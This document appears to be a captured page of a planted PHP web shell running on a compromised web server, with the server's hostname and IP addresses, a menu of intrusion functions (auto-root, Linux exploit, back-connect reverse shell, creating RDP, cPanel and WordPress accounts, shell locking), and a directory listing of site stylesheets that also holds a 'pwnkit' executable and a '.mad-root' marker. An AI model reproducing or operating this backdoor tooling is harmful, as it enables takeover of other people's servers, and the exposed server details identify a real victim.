Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
finalho /
public_html /
admin /
focus /
scss /
pages /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
_ecom-billing.scss
0
B
-rw-r--r--
_ecom-checkout.scss
0
B
-rw-r--r--
_ecom-customer-details.scss
0
B
-rw-r--r--
_ecom-customers.scss
2
B
-rw-r--r--
_ecom-invoice.scss
0
B
-rw-r--r--
_ecom-order-details.scss
0
B
-rw-r--r--
_ecom-product-detail.scss
5.74
KB
-rw-r--r--
_ecom-product-grid.scss
0
B
-rw-r--r--
_ecom-product-list.scss
1.1
KB
-rw-r--r--
_ecom-product-order.scss
0
B
-rw-r--r--
_ecom-shopping-cart.scss
0
B
-rw-r--r--
_homepage.scss
3.4
KB
-rw-r--r--
_page-auth.scss
1.8
KB
-rw-r--r--
_page-error.scss
0
B
-rw-r--r--
_page-pricing.scss
1.87
KB
-rw-r--r--
_page-timeline.scss
7.13
KB
-rw-r--r--
_pages.scss
513
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _page-auth.scss
// .authincation{ // height: 100%; // } .authincation-content{ background: $white; box-shadow: 0 0 35px 0 rgba(154, 161, 171, 0.15); border-radius: 5px; @at-root [data-theme-version="dark"] & { background: $dark-card; box-shadow: none; } } .welcome-content{ background: url('./../images/1.jpg'); background-size: cover; background-position: center; height: 100%; padding: 75px 50px; position: relative; z-index: 1; border-top-left-radius: 5px; border-bottom-left-radius: 5px; &::after{ content: ''; position: absolute; left: 0; right: 0; top: 0; bottom: 0; background: $primary; opacity: 0.75; z-index: -1; border-top-left-radius: 5px; border-bottom-left-radius: 5px; } .welcome-title{ color: $white; font-weight: 500; font-size: 20px; } p{ color: $white; } .brand-logo{ a{ display: inline-block; margin-bottom: 20px; font-weight: 700; color: $white; font-size: 20px; img{ width: 100px; } } } .intro-social{ position: absolute; bottom: 75px; ul{ margin-bottom: 0; li{ display: inline-block; a{ color: $white; font-size: 14px; padding: 0px 7px; } } } } } .auth-form{ padding: 50px 50px; .btn{ height: 50px; font-weight: 700; } .page-back{ display: inline-block; margin-bottom: 15px; } }
Close